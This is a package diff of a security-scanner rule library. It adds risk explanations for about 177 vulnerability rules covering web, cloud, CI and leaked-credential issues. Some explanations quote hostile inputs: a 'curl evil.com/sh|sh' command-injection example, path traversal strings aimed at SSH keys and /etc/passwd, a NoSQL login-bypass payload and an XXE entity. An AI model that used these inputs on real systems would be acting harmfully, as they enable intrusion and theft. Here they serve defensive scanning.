xploitscan-shared-rules 1.4.0 → 1.6.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/dist/index.cjs +219 -1
- package/dist/index.cjs.map +1 -1
- package/dist/index.d.cts +40 -1
- package/dist/index.d.ts +40 -1
- package/dist/index.js +218 -1
- package/dist/index.js.map +1 -1
- package/package.json +1 -1
package/dist/index.cjs
CHANGED
|
@@ -39,6 +39,7 @@ __export(index_exports, {
|
|
|
39
39
|
calculateGrade: () => calculateGrade,
|
|
40
40
|
callSpreads: () => callSpreads,
|
|
41
41
|
callbackHell: () => callbackHell,
|
|
42
|
+
classifyExposure: () => classifyExposure,
|
|
42
43
|
clickjacking: () => clickjacking,
|
|
43
44
|
clientComponentSecret: () => clientComponentSecret,
|
|
44
45
|
clientSideAuth: () => clientSideAuth,
|
|
@@ -282,9 +283,225 @@ var RULE_IMPACTS = {
|
|
|
282
283
|
VC008: "Without rate limiting, an attacker can flood your API with requests causing denial of service, brute-force attacks, or excessive cloud billing.",
|
|
283
284
|
VC009: "With CORS set to allow all origins, any website can make authenticated requests to your API from a user's browser, enabling cross-site data theft.",
|
|
284
285
|
VC010: "Hiding UI elements without server-side checks means an attacker can call your API directly and bypass the restriction entirely.",
|
|
285
|
-
VC011: "The NEXT_PUBLIC_ prefix exposes this value in the browser bundle. If it's a secret, anyone viewing your site's JavaScript can extract it."
|
|
286
|
+
VC011: "The NEXT_PUBLIC_ prefix exposes this value in the browser bundle. If it's a secret, anyone viewing your site's JavaScript can extract it.",
|
|
287
|
+
VC012: "While Firebase API keys aren't strictly secret, an unrestricted key lets attackers abuse your project's quotas, run up Firebase costs, or hit endpoints that should be locked down by App Check or HTTP referrer rules.",
|
|
288
|
+
VC013: "Performing privileged operations with the anon key either fails outright or silently bypasses RLS in unsafe ways, leading to leaked rows or broken auth checks that any logged-in user can exploit.",
|
|
289
|
+
VC014: "An unignored .env file gets committed on the next git add, leaking database passwords, API keys, and OAuth secrets to anyone with repo access \u2014 including the entire internet if the repo is public.",
|
|
290
|
+
VC015: "If any user-controlled string reaches eval() or new Function(), an attacker gets arbitrary JavaScript execution in your app \u2014 full session takeover in the browser, or RCE on the server in Node.",
|
|
291
|
+
VC016: "An attacker can craft a link from your domain that redirects victims to a phishing page or malware download, abusing your domain's trust to bypass user suspicion and email filters.",
|
|
292
|
+
VC017: "Cookies missing httpOnly can be stolen by any XSS payload; missing secure leaks them over HTTP; missing sameSite enables cross-site request forgery against logged-in users.",
|
|
293
|
+
VC018: "A leaked Clerk, Auth0, or NextAuth secret key lets an attacker mint valid sessions for any user in your app, fully impersonating accounts and bypassing every authentication check.",
|
|
294
|
+
VC019: "With nodeIntegration on or contextIsolation off, any XSS in your renderer becomes RCE on the user's machine \u2014 the page can require('child_process') and run shell commands as the user.",
|
|
295
|
+
VC020: "Without a CSP, a single XSS bug becomes catastrophic \u2014 the attacker can load scripts from anywhere, exfiltrate data to their own server, and inject keyloggers with no browser-side defense in depth.",
|
|
296
|
+
VC021: "An attacker-controlled path (../../../.ssh/id_rsa) sent through IPC lets the renderer read or overwrite arbitrary files on disk \u2014 SSH keys, .env files, browser cookie databases.",
|
|
297
|
+
VC022: "Stored XSS in exported HTML lets an attacker who plants malicious content in a document run JavaScript in every viewer's browser \u2014 stealing tokens, hijacking the renderer, or pivoting via Electron APIs.",
|
|
298
|
+
VC023: "By sending a JSON body with __proto__ or constructor.prototype, an attacker can corrupt every object in your process \u2014 bypassing auth checks, mutating config flags, or triggering RCE through gadget chains in popular libraries.",
|
|
299
|
+
VC024: "An attacker (or a buggy client) uploading multi-gigabyte payloads can fill your disk or exhaust process memory, taking the service down for everyone.",
|
|
300
|
+
VC025: "A filename like ../../etc/passwd or one containing shell metacharacters lets an attacker overwrite files outside the upload directory or inject commands when the filename is later passed to a shell.",
|
|
301
|
+
VC026: "A malicious link inside the app can navigate the entire window away from your trusted UI to a phishing site that looks identical, harvesting credentials or pushing fake updates.",
|
|
302
|
+
VC027: "Without X-Content-Type-Options: nosniff and similar headers, browsers may execute uploaded files as scripts and leak full referrer URLs containing tokens to third parties.",
|
|
303
|
+
VC028: "When user input controls API URLs, model names, or keys without validation, attackers can redirect calls to their own endpoint, swap to expensive models on your bill, or smuggle in injected parameters.",
|
|
304
|
+
VC029: "Code that trusts postMessage or custom event payloads without origin/type checks lets any embedded iframe or extension trigger sensitive actions in your app's context.",
|
|
305
|
+
VC030: "Deserializing attacker-controlled pickle, YAML, or PHP unserialize data is straight-line RCE \u2014 published gadget chains turn a single POST into a remote shell on your server.",
|
|
306
|
+
VC031: "Anyone who reads the source can sign their own JWTs, forging tokens for any user including admins. There is no way to detect the forgery server-side.",
|
|
307
|
+
VC032: "Without HSTS and HTTPS enforcement, an attacker on the network (coffee shop wifi, malicious ISP) can intercept the first request, downgrade to HTTP, and steal session cookies and credentials.",
|
|
308
|
+
VC033: "Debug mode exposes stack traces, environment variables, and internal routes \u2014 handing attackers a map of your stack, your secrets, and often a remote shell via a debug REPL endpoint.",
|
|
309
|
+
VC034: "Math.random() output is predictable from a few samples. Tokens, password reset codes, and session IDs generated this way can be guessed, letting an attacker take over accounts.",
|
|
310
|
+
VC035: "A link like yourapp.com/login?next=evil.com sent in a phishing email looks legitimate to the victim and to email filters, but lands them on the attacker's site after login.",
|
|
311
|
+
VC036: "Uncaught React errors render raw stack traces to users, leaking file paths, component names, and sometimes secrets from props \u2014 a free recon gift to an attacker probing your app.",
|
|
312
|
+
VC037: "Stack traces in API responses reveal your file structure, library versions, and ORM internals, letting attackers fingerprint known CVEs and craft targeted exploits.",
|
|
313
|
+
VC038: "Validating only the file extension lets an attacker upload a .jpg that is actually a PHP webshell or HTML with embedded scripts, leading to stored XSS or RCE when the file is served.",
|
|
314
|
+
VC039: "Without a lockfile, every install resolves fresh versions \u2014 a typosquatted or compromised dependency upgrade lands in production without anyone noticing, exactly the vector behind several recent npm supply-chain attacks.",
|
|
315
|
+
VC040: "An exposed .git directory lets anyone download your entire repository \u2014 every secret you ever committed (even ones you thought you removed), full source code, and commit history.",
|
|
316
|
+
VC041: "An attacker can make your server fetch internal URLs like http://169.254.169.254/ (AWS metadata) or http://localhost:5432, exfiltrating cloud credentials or pivoting to internal services.",
|
|
317
|
+
VC042: "Spreading req.body into a User.create() lets an attacker register with isAdmin: true or set verified: true on their own account, escalating privileges with a single request.",
|
|
318
|
+
VC043: "An attacker can recover an API key or session token one byte at a time by measuring response time differences, eventually guessing the full secret without ever seeing it.",
|
|
319
|
+
VC044: "An attacker injecting newlines into log messages can forge fake log entries to cover their tracks, spoof other users' actions, or break log parsers and SIEM rules.",
|
|
320
|
+
VC045: "Allowing 6-character or dictionary passwords means most accounts fall in seconds to a credential-stuffing list, leading to mass account takeover.",
|
|
321
|
+
VC046: "Without session ID rotation on login, an attacker who tricks a victim into using a known session ID is then logged in as the victim once they authenticate \u2014 full account takeover.",
|
|
322
|
+
VC047: "Without lockout or rate limiting, an attacker can throw millions of leaked credential pairs at /login until they find ones that work, taking over user accounts en masse.",
|
|
323
|
+
VC048: 'MongoDB operators in JSON bodies ({"password": {"$ne": null}}) bypass login checks entirely, dump collections, or modify documents \u2014 the NoSQL equivalent of SQL injection.',
|
|
324
|
+
VC049: "Database credentials in committed config files give anyone with repo access a direct connection string to production \u2014 read all data, modify any row, drop tables.",
|
|
325
|
+
VC050: "Without TLS, database passwords and every row of data crosses the network in plaintext, readable by anyone tapping the connection \u2014 including cloud providers' internal logs.",
|
|
326
|
+
VC051: "With introspection on, any unauthenticated user can dump your full GraphQL schema \u2014 every field, every mutation, every internal type \u2014 handing attackers a complete attack surface map.",
|
|
327
|
+
VC052: "An attacker posting a 10GB JSON body to your API exhausts process memory and crashes the server, taking your app offline with one curl command.",
|
|
328
|
+
VC053: "Hardcoded IPs in allowlists become stale and either grant access to whoever now holds the address or break legitimate users when infrastructure rotates \u2014 both end in a security incident.",
|
|
329
|
+
VC054: "Any XSS bug \u2014 even one in a third-party script \u2014 can read every token in localStorage and send it to an attacker. Stolen tokens often have no expiry and survive password resets.",
|
|
330
|
+
VC055: "A .map file in production lets anyone download the original, unminified source code of your app \u2014 including comments, internal class names, and any logic you assumed was hidden by minification.",
|
|
331
|
+
VC056: "Without frame-ancestors or X-Frame-Options, an attacker can iframe your app under a fake UI, tricking logged-in users into clicking buttons that perform real actions on their account.",
|
|
332
|
+
VC057: "Wildcard IAM permissions mean a single compromised credential \u2014 a leaked CI token, an SSRF-leaked metadata role \u2014 gives the attacker full account takeover, including the ability to delete every resource.",
|
|
333
|
+
VC058: "A vulnerability in your app or any container library becomes root inside the container. Combined with a kernel exploit or a misconfigured volume mount, that's host root.",
|
|
334
|
+
VC059: "Binding to 0.0.0.0 on a developer laptop or shared server exposes Postgres, Redis, or Mongo to anyone on the local network \u2014 typically with no password, since it was meant to be local-only.",
|
|
335
|
+
VC060: "MD5/SHA-256 password hashes can be cracked at billions of attempts per second on a GPU. A leaked database means every user's password is recovered within hours, ready for credential stuffing.",
|
|
336
|
+
VC061: "With certificate verification off, any attacker on the network path can transparently intercept HTTPS calls \u2014 stealing API keys, modifying webhook responses, or returning poisoned data from upstream services.",
|
|
337
|
+
VC062: "A hardcoded encryption key in source code means every encrypted record in the database is decrypt-able by anyone with repo access. A reused IV in CBC/GCM modes also leaks plaintext directly.",
|
|
338
|
+
VC063: "dangerouslySetInnerHTML on user-controlled strings is XSS-by-design \u2014 an attacker who lands content in your database (a comment, a profile bio, a chat message) gets script execution in every viewer's browser.",
|
|
339
|
+
VC064: "Server Actions are publicly callable URLs even though they look like function calls. Without auth checks, any visitor can invoke them with arbitrary args, bypassing every UI restriction.",
|
|
340
|
+
VC065: "An unauthenticated /api/ route is just a public URL \u2014 attackers find them via bundle analysis or wordlists and call them directly to read or modify data.",
|
|
341
|
+
VC066: "Once a secret reaches a 'use client' component, Next.js inlines it into the JavaScript bundle. Anyone visiting the site can extract it from the page source and use your API as you.",
|
|
342
|
+
VC067: "Custom URL scheme handlers that act on parameters without validation let any webpage or app trigger sensitive actions \u2014 opening attacker URLs in your auth context, transferring funds, or wiping data.",
|
|
343
|
+
VC068: "AsyncStorage is plaintext on disk. A jailbroken phone, a forensic backup, or a malicious app on Android with debug access can read every stored token, password, or API key.",
|
|
344
|
+
VC069: "Without certificate pinning, anyone who can install a custom CA on the device (corporate MDM, compromised phone, malicious VPN) can decrypt all traffic to your API and modify responses.",
|
|
345
|
+
VC070: 'android:debuggable="true" in production lets anyone with adb access attach a debugger, dump memory containing tokens and PII, and bypass any client-side security check in the app.',
|
|
346
|
+
VC071: "DEBUG=True in production renders Django's yellow error page on every exception \u2014 exposing source code lines, the full settings dictionary (including SECRET_KEY and database URLs), and installed apps.",
|
|
347
|
+
VC072: "A hardcoded Flask SECRET_KEY lets anyone with the source forge session cookies and CSRF tokens for any user, fully impersonating accounts including admins.",
|
|
348
|
+
VC073: "pickle.loads() on untrusted input is RCE-by-design \u2014 published one-line payloads spawn a reverse shell. If any user-controlled bytes reach pickle, your server is compromised.",
|
|
349
|
+
VC074: "Disabling CSRF on a state-changing view lets an attacker's website trigger requests in the victim's browser \u2014 transferring funds, changing email, deleting data \u2014 all using the victim's logged-in session.",
|
|
350
|
+
VC075: "Writing ${{ github.event.issue.title }} into a run: block executes whatever shell payload an attacker puts in an issue title \u2014 running with your repo's secrets and write tokens, leading to repo takeover.",
|
|
351
|
+
VC076: "Hardcoded tokens in CI YAML are visible in every fork, every PR diff, and every public Action run log \u2014 attackers scrape these constantly and use the credentials within minutes of commit.",
|
|
352
|
+
VC077: "Wildcard CORS in serverless config combined with credentials means any attacker site can read authenticated responses from your API using the victim's cookies \u2014 full data theft.",
|
|
353
|
+
VC078: "A privileged container is essentially root on the node \u2014 kernel modules can be loaded, the host filesystem can be mounted, and pivoting to other pods or stealing kubelet credentials is trivial.",
|
|
354
|
+
VC079: "A JWT library that accepts alg:none lets an attacker strip the signature from a token, change the user ID to admin, and the server treats it as valid \u2014 instant privilege escalation.",
|
|
355
|
+
VC080: "A regex like (a+)+$ on a 30-character malicious input takes minutes of CPU to evaluate. An attacker sends a few of these and your single Node.js process is stuck \u2014 DoS with no bandwidth needed.",
|
|
356
|
+
VC081: 'An XML parser with external entities enabled lets an attacker include <!ENTITY xxe SYSTEM "file:///etc/passwd"> in a SOAP/SAML payload, reading server files or pivoting to internal HTTP services.',
|
|
357
|
+
VC082: "Rendering a Jinja2/Handlebars/EJS template from a user-controlled string is RCE \u2014 attackers can break out of the template syntax to execute Python or Node code in the server process.",
|
|
358
|
+
VC083: "Java deserialization with Apache Commons or Spring on the classpath is essentially guaranteed RCE \u2014 public gadget chains turn a single readObject call into a remote shell.",
|
|
359
|
+
VC084: "Without integrity= on a CDN script tag, a CDN compromise (or a takeover of an unmaintained domain) means attacker-controlled JS runs in every visitor's browser as if you served it.",
|
|
360
|
+
VC085: "Open admin or actuator endpoints often expose env vars, heap dumps, or thread state \u2014 and many ship with default-credential admin UIs that take over the application with no exploit needed.",
|
|
361
|
+
VC086: "ws:// transmits messages in plaintext. Anyone on the network \u2014 public wifi, malicious ISP, an MITM proxy \u2014 can read or modify chat messages, real-time data, or auth handshakes.",
|
|
362
|
+
VC087: "Without HSTS, a single user typing yourdomain.com (defaulting to HTTP) lets an MITM attacker intercept the redirect, downgrade the connection, and steal cookies before HTTPS ever happens.",
|
|
363
|
+
VC088: "Tokens in URLs end up in web server access logs, the browser's history, the Referer header sent to every third-party script, and bookmarks \u2014 a long, lossy trail of credential exposure.",
|
|
364
|
+
VC089: "Without Content-Disposition: attachment, an uploaded HTML file is rendered inline at your origin \u2014 making file uploads a stored XSS vector against any user who clicks the download link.",
|
|
365
|
+
VC090: "A spoofed Host header in the request reflects into a redirect URL, sending password-reset emails or OAuth callbacks to an attacker-controlled host that captures the token.",
|
|
366
|
+
VC091: "TOCTOU race conditions let an attacker swap a file (or database row) between your check and your action \u2014 e.g. checking permissions on a path then opening it after a symlink is swapped in.",
|
|
367
|
+
VC092: "Spreading req.body into objects you later use as lookups (settings, permissions, options) lets an attacker pollute the prototype chain \u2014 every object in the process now inherits attacker-set properties.",
|
|
368
|
+
VC093: "An attacker requesting filename=../../../etc/passwd reads any file the server process can access, including .env files, SSH keys, and other tenants' uploaded data on shared hosts.",
|
|
369
|
+
VC094: "Any user-controlled string reaching exec() or system() means an attacker runs arbitrary shell commands on your server \u2014 installing backdoors, dumping the database, or pivoting into your VPC.",
|
|
370
|
+
VC095: "A localhost CORS allowlist trusts anything running on the user's machine \u2014 including malicious browser extensions or local development servers spun up by other apps to phish your API.",
|
|
371
|
+
VC096: "Insecure gRPC channels send service-to-service traffic in plaintext, including any auth tokens in metadata \u2014 a compromised pod or a network sniffer reads everything.",
|
|
372
|
+
VC097: "console.log statements left around can leak tokens, PII, and internal IDs into the browser console \u2014 visible to any user, browser extension, or screen-recording tool, and to anyone reviewing console output during support sessions.",
|
|
373
|
+
VC098: "readFileSync in a request handler blocks Node's single event loop. One slow disk read holds up every concurrent request, turning normal load into a cascading outage.",
|
|
374
|
+
VC099: "Each re-render adds another listener that's never removed \u2014 over time the page leaks memory, slows down, and eventually crashes the tab on long-running screens like dashboards.",
|
|
375
|
+
VC100: "An N+1 query pattern means a list of 1,000 items triggers 1,000+ database round-trips. Pages that work in dev with 10 rows time out in production and crush the database under load.",
|
|
376
|
+
VC101: "Importing all of lodash or moment adds 70-300KB to every page load. Mobile users on slow networks see your app freeze for seconds before any UI appears.",
|
|
377
|
+
VC102: "Heavy synchronous work on the main thread freezes the browser's UI \u2014 buttons stop responding, scroll jitters, and users mash refresh, often hitting your API harder than necessary.",
|
|
378
|
+
VC103: "TODO/FIXME comments often mark known-broken security or correctness paths that were meant to be fixed before launch and were forgotten \u2014 an attacker grepping the source bundle can find them as fast as you can.",
|
|
379
|
+
VC104: "Silently swallowing errors hides bugs that cause data loss, failed payments, or security check bypasses \u2014 by the time a user complains, you've lost the diagnostic trail.",
|
|
380
|
+
VC105: "Deeply nested promise chains are a major source of subtle bugs (missed catches, wrong error context) and slow incident response \u2014 the next on-call engineer can't read it during an outage.",
|
|
381
|
+
VC106: "Magic numbers like if (status == 7) hide intent and make safe refactors impossible \u2014 when the meaning of 7 changes, every callsite has to be hunted down by hand.",
|
|
382
|
+
VC107: "Without S3 server-side encryption, a misconfigured bucket policy or a stolen backup tape means data sits at rest in the clear \u2014 failing SOC 2, HIPAA, and GDPR controls during audits.",
|
|
383
|
+
VC108: "0.0.0.0/0 on all ports means your EC2/RDS/ElastiCache instance is reachable from the entire internet. Internet-wide scanners find it in minutes and start credential-stuffing default ports.",
|
|
384
|
+
VC109: "A publicly accessible RDS instance is one weak password (or one CVE in the DB engine) away from full database compromise \u2014 and they're constantly probed by automated scanners.",
|
|
385
|
+
VC110: "Without CloudTrail, a compromised AWS credential leaves no audit trail \u2014 you can't tell what the attacker accessed, whether they're still in, or what data was exfiltrated.",
|
|
386
|
+
VC111: "Lambda outside a VPC can't reach private RDS or ElastiCache safely without exposing them publicly, and lacks the network controls that contain blast radius if the function is exploited.",
|
|
387
|
+
VC112: "FROM node:latest builds a different image every week. A breaking upstream change crashes production at 2am, or a poisoned tag silently swaps in malicious code on the next deploy.",
|
|
388
|
+
VC113: "COPY . . without a .dockerignore bakes your .env, .git history, and editor swap files into the published image \u2014 anyone who pulls the image extracts every secret you've ever committed.",
|
|
389
|
+
VC114: "Each exposed port is one more thing to misconfigure. Forgotten debug or admin ports (Redis 6379, Elastic 9200, Mongo 27017) are the most common entry point in cloud breaches.",
|
|
390
|
+
VC115: "base64 is encoding, not encryption. A leaked Kubernetes manifest or kubectl get secret access from a compromised pod hands the attacker every credential in the namespace in plaintext.",
|
|
391
|
+
VC116: "A pod without resource limits can OOM-kill its neighbors, hog every CPU on the node, or spiral into infinite memory growth that takes the whole cluster's noisy-neighbor protection down.",
|
|
392
|
+
VC117: "User input in a file path lets attackers read /etc/passwd, app source code, or other tenants' files; in write contexts it overwrites system binaries or config to gain code execution on next run.",
|
|
393
|
+
VC118: "PII in logs ends up in CloudWatch, Datadog, Sentry, and engineer laptops \u2014 multiplying the surface area of any breach and triggering GDPR/HIPAA breach-notification obligations even if the app DB is intact.",
|
|
394
|
+
VC119: "A leaked OAuth client_secret lets an attacker impersonate your application, exchanging codes for tokens and acting as your app against any user who has previously authorized \u2014 silent account takeover.",
|
|
395
|
+
VC120: "Without a state parameter in OAuth, an attacker can stitch a victim's session to the attacker's account (account injection), or CSRF the callback to attach the attacker's identity to the victim.",
|
|
396
|
+
VC121: "An action pinned to @main runs whatever the maintainer (or anyone who compromises the repo) pushes next. Pin to a SHA so a supply-chain compromise of a third-party action can't push code into your CI.",
|
|
397
|
+
VC122: "TLS 1.0/1.1 are vulnerable to BEAST, POODLE, and Lucky 13. Modern compliance frameworks (PCI DSS, HIPAA) explicitly forbid them and audits will fail until disabled.",
|
|
398
|
+
VC123: "A 1024-bit RSA key is within reach of well-funded attackers and trivial to factor by 2030. Any key signing tokens or TLS certs needs to be 2048-bit minimum, ideally 3072+.",
|
|
399
|
+
VC124: "ECB mode encrypts identical blocks identically, so patterns in the plaintext (think the famous ECB-encrypted Linux penguin) leak through ciphertext \u2014 useless for any real data.",
|
|
400
|
+
VC125: "Predictable reset tokens, tokens that don't expire, or username-enumeration in the reset flow let attackers take over accounts via the password-reset endpoint without ever knowing the original password.",
|
|
401
|
+
VC126: "Terraform state files contain plaintext copies of every resource attribute \u2014 RDS passwords, IAM keys, TLS private keys. Committing one to git is equivalent to leaking your full infrastructure credentials.",
|
|
402
|
+
VC127: "Unauthenticated DELETE/PUT/PATCH endpoints let any internet user destroy or modify data \u2014 the most common 'how was your whole user table wiped overnight' incident.",
|
|
403
|
+
VC128: "Manually parsing Content-Length and Transfer-Encoding behind a CDN or load balancer can desync the proxy and origin, letting attackers smuggle requests that bypass auth or hit other users' sessions.",
|
|
404
|
+
VC129: "Storing SSNs, credit cards, or health data unencrypted at the column level means a single read-only DB leak (backup, replica, log) is a full PII breach with mandatory disclosure and major regulatory fines.",
|
|
405
|
+
VC130: "Without rate limiting on auth routes, attackers throw credential lists at /login or trigger thousands of password-reset emails to specific accounts \u2014 credential stuffing and email-bombing on demand.",
|
|
406
|
+
VC131: "A dependency with a known CVE means a public exploit may already work against your app. Attackers scan for vulnerable versions of common libraries and pivot in within hours of disclosure.",
|
|
407
|
+
VC132: "A leaked Anthropic API key lets attackers run unlimited Claude API calls on your account \u2014 burning through your quota in hours and racking up thousands of dollars in charges before you notice.",
|
|
408
|
+
VC133: "A leaked GitHub PAT gives attackers read/write access to your repos depending on scopes \u2014 they can push backdoored commits, steal private code, exfiltrate Actions secrets, and pivot to npm publish tokens stored as repo secrets.",
|
|
409
|
+
VC134: "A leaked SendGrid key lets attackers send email from your verified domain \u2014 phishing your customers from a real-looking address that passes SPF/DKIM/DMARC and shreds your sender reputation.",
|
|
410
|
+
VC135: "A leaked Slack token reads your workspace's messages and channel history \u2014 exposing internal conversations, customer data shared in support channels, and any secrets pasted in DMs (which is most secrets, in practice).",
|
|
411
|
+
VC136: "A leaked GCP service account JSON is project-level access \u2014 depending on roles, attackers can spin up cryptominers, dump every Cloud Storage bucket, or escalate to organization admin.",
|
|
412
|
+
VC137: "A leaked Shopify access token exposes your full store: customer PII (names, emails, addresses), order history, payment data scope, and the ability to modify products or refund orders.",
|
|
413
|
+
VC138: "A leaked GitLab token grants repository and pipeline access \u2014 attackers push commits, trigger CI to run malicious code with all your CI secrets, and exfiltrate any private project the token can see.",
|
|
414
|
+
VC139: "A leaked Twilio key sends premium-rate SMS and international calls on your dime \u2014 toll fraud cases regularly hit five figures overnight before account locks kick in.",
|
|
415
|
+
VC140: "A leaked Mailgun key sends email from your domain \u2014 attackers launch phishing campaigns that pass DMARC because they really do come from you, destroying your sender reputation and customer trust.",
|
|
416
|
+
VC141: "A leaked Datadog key exposes logs, metrics, traces, and infrastructure topology \u2014 attackers map your entire stack, find vulnerable services from APM data, and grep logs for the next set of secrets.",
|
|
417
|
+
VC142: "A leaked Vercel token deploys arbitrary code to your production sites and reads every environment variable \u2014 which contains your other secrets, making this one leak a gateway to all the rest.",
|
|
418
|
+
VC143: "The Supabase service_role key bypasses every RLS policy. A leaked key means an attacker reads every user's data, deletes any row, and creates admin accounts at will \u2014 full database compromise.",
|
|
419
|
+
VC144: "A leaked Vault token is a master key \u2014 depending on policies it unlocks database creds, AWS roles, TLS certs, and every other secret your infra depends on. One leak compromises the whole vault.",
|
|
420
|
+
VC145: "A leaked Pinecone key lets attackers read or wipe every vector index \u2014 exfiltrating embedded user data (often containing PII or business documents) and corrupting your RAG retrieval to inject prompts.",
|
|
421
|
+
VC146: "A token in a query string ends up in your reverse proxy logs, your CDN logs, the user's browser history, and the Referer header sent to every third-party tracker on your page \u2014 multi-channel credential exposure.",
|
|
422
|
+
VC147: "Logging a token writes it to stdout, persists it through your log pipeline (Datadog, Sentry, CloudWatch), and lands it on engineer laptops via tail -f \u2014 turning a private value into one shared across your whole observability stack.",
|
|
423
|
+
VC148: "Returning secrets in error JSON exposes them to whoever can trigger the error \u2014 often unauthenticated callers \u2014 and lands them in client-side error tracking like Sentry where they're visible to many engineers.",
|
|
424
|
+
VC149: "DefinePlugin and Vite's define inline values directly into the bundled JS at build time. Any 'secret' configured this way ships in the page source for every visitor.",
|
|
425
|
+
VC150: "Tokens in <meta> tags or data-* attributes are visible to view-source, browser extensions, search engine crawlers, and the Wayback Machine \u2014 effectively public the moment the page loads.",
|
|
426
|
+
VC151: "Secrets in command-line arguments show up in ps aux, /proc/*/cmdline, shell history, and audit logs, readable by any other user on the same machine, including unprivileged co-tenants on shared hosts.",
|
|
427
|
+
VC152: "Without signature verification, an attacker can POST fake Clerk session events to create admin users, fake GitHub events to trigger deploys, fake Resend events to mark invoices paid \u2014 every webhook turns into an unauthenticated mutation endpoint.",
|
|
428
|
+
VC153: "Reflecting Origin into Access-Control-Allow-Origin while Allow-Credentials is true is worse than wildcard CORS \u2014 browsers will send cookies, so any malicious site reads authenticated responses from your API as the logged-in victim.",
|
|
429
|
+
VC154: "Without schema validation, attackers send oversized strings, unexpected types, or nested JSON that triggers crashes, ORM coercion bugs, or injection via fields the code didn't expect.",
|
|
430
|
+
VC155: "Without rate limiting on routes that call OpenAI/Anthropic/Cohere, a single malicious user (or a logged-in attacker with a script) can exhaust your monthly LLM budget in minutes \u2014 denial of wallet.",
|
|
431
|
+
VC156: "An unpaginated list endpoint returns every row to the caller. Once the table grows, a single GET dumps gigabytes, OOMs the server, and exfiltrates the entire user list to anyone who finds the URL.",
|
|
432
|
+
VC157: "Prisma Studio or Drizzle Studio in production is a public database admin UI \u2014 anyone who finds the URL gets full read/write access to every table with no auth.",
|
|
433
|
+
VC158: "A route like /api/orders/:id without an ownership check lets an attacker increment IDs and read every other user's orders, invoices, messages, or files \u2014 the most common real-world data breach pattern.",
|
|
434
|
+
VC159: "A leaked Cohere API key burns through your tokens budget on attacker-driven inference requests, racking up bills and potentially exposing usage history that reveals customers' prompts.",
|
|
435
|
+
VC160: "A leaked Replicate token (r8_*) lets attackers run expensive GPU models \u2014 image and video generation can rack up hundreds of dollars per hour billed to your account.",
|
|
436
|
+
VC161: "A leaked Mistral API key burns through your inference budget on attacker workloads, with no usage caps you can rely on until the bill arrives.",
|
|
437
|
+
VC162: "A leaked Together AI key lets attackers run any open-source model on the platform on your tab \u2014 Llama, Mixtral, Stable Diffusion \u2014 burning through credits in minutes.",
|
|
438
|
+
VC163: "A leaked Groq key (gsk_*) lets attackers run Groq's high-throughput LPU inference at your expense, exhausting credits and rate limits before you notice.",
|
|
439
|
+
VC164: "A leaked Fireworks AI key (fw_*) lets attackers run hosted models on your account, racking up per-token charges with no warning.",
|
|
440
|
+
VC165: "A leaked Postmark token sends transactional email from your domain \u2014 an attacker phishes your real customers from your real sender address, passing every spam filter.",
|
|
441
|
+
VC166: "A leaked Resend key (re_*) sends email from your verified domain \u2014 phishing campaigns from a real sender address torch your domain reputation and trick customers who trust your emails.",
|
|
442
|
+
VC167: "A leaked Loops key exposes your entire customer email list and lets attackers send authorized-looking emails from your domain \u2014 a customer-list exfiltration plus phishing weapon in one.",
|
|
443
|
+
VC168: "A leaked Cloudflare token, depending on scopes, lets attackers rewrite DNS to point your domain at their server, disable your WAF, or wipe R2 buckets \u2014 full traffic and data control.",
|
|
444
|
+
VC169: "A leaked Fastly token lets attackers purge your cache (causing origin overload), inject malicious VCL to redirect traffic, or modify how every user's request is served.",
|
|
445
|
+
VC170: "A leaked Netlify PAT (nfp_*) deploys arbitrary code to your sites and reads every env var on every site \u2014 including secrets for your APIs, databases, and other providers.",
|
|
446
|
+
VC171: "A leaked Railway token reads every environment variable across your projects (database URLs, third-party keys), redeploys services with attacker code, and accesses connected databases directly.",
|
|
447
|
+
VC172: "A leaked Fly.io token (FlyV1 fm2_*) deploys arbitrary apps in your org, reads and modifies secrets on machines, and gives attackers a foothold inside your private Fly network.",
|
|
448
|
+
VC173: "A leaked Algolia admin key replaces every indexed record \u2014 attackers swap your search results for SEO spam or phishing links, and create their own scoped keys for persistent access.",
|
|
449
|
+
VC174: "A leaked Qdrant key reads and modifies every vector collection \u2014 attackers exfiltrate embedded user content and can poison RAG retrieval to inject prompts into AI features.",
|
|
450
|
+
VC175: "A leaked Weaviate key gives attackers full access to embeddings and metadata for every indexed document, exfiltrating private content and corrupting search results.",
|
|
451
|
+
VC176: "A leaked Linear key (lin_api_*) exposes your private roadmap, customer-reported bugs (often containing reproduction steps for unpatched issues), and internal team conversations.",
|
|
452
|
+
VC177: "A leaked Notion integration token (secret_*) reads every page and database the integration touches \u2014 typically the most sensitive content in a company: financial models, hiring decisions, security runbooks.",
|
|
453
|
+
VC178: "A leaked Discord bot token gives attackers your bot's full identity in every server it's in \u2014 they can DM users, mass-spam channels, exfiltrate messages per intent scopes, and ban or kick members.",
|
|
454
|
+
VC179: "A leaked Intercom token exposes every customer conversation and contact record \u2014 support history, screenshots customers shared, and PII tied to email and company data.",
|
|
455
|
+
VC180: "A leaked Sentry token (sntrys_*) exposes captured stack traces and PII from errors, and lets attackers tamper with releases or upload malicious source maps that map errors to attacker-controlled code.",
|
|
456
|
+
VC181: "A leaked Better Stack source token lets attackers flood your log retention with junk to mask their activity elsewhere or rack up your ingestion bill.",
|
|
457
|
+
VC182: "A leaked Highlight.io key exposes recorded session replays \u2014 including any text users typed (passwords, credit cards) that wasn't manually masked, plus full console logs.",
|
|
458
|
+
VC183: "A leaked Plivo token enables toll fraud \u2014 attackers dial premium-rate numbers and send international SMS billed to your account, often racking up thousands before account locks trigger.",
|
|
459
|
+
VC184: "pull_request_target with a checkout of the PR head is the canonical critical CI vulnerability \u2014 any forked PR can run code (install scripts, lint hooks, build steps) with your repo's write tokens and every secret in your environment, leading to repo takeover and secret exfiltration.",
|
|
460
|
+
VC185: "permissions: write-all gives every step in the workflow full repo, packages, and deployments write access. A single compromised action \u2014 direct or transitive \u2014 can push commits, alter releases, and steal every secret the job has access to.",
|
|
461
|
+
VC186: "A malicious PR title or commit message containing $(curl evil.com/sh|sh) gets executed as shell on your runner with your repo's secrets \u2014 same root cause as SQL injection, just in a CI context.",
|
|
462
|
+
VC187: "Passing repo secrets via with: hands them to the action's source code and every dependency it pulls. The 2025 tj-actions/changed-files compromise stole CI secrets exactly this way; minimize what you pass and prefer pinning by SHA.",
|
|
463
|
+
VC188: "ADD auto-extracts archives and fetches URLs without integrity checks \u2014 both are foot-guns. Auto-extraction enables zip-slip; URL fetches break reproducibility and fetch whatever the upstream server hands back, even if compromised.",
|
|
464
|
+
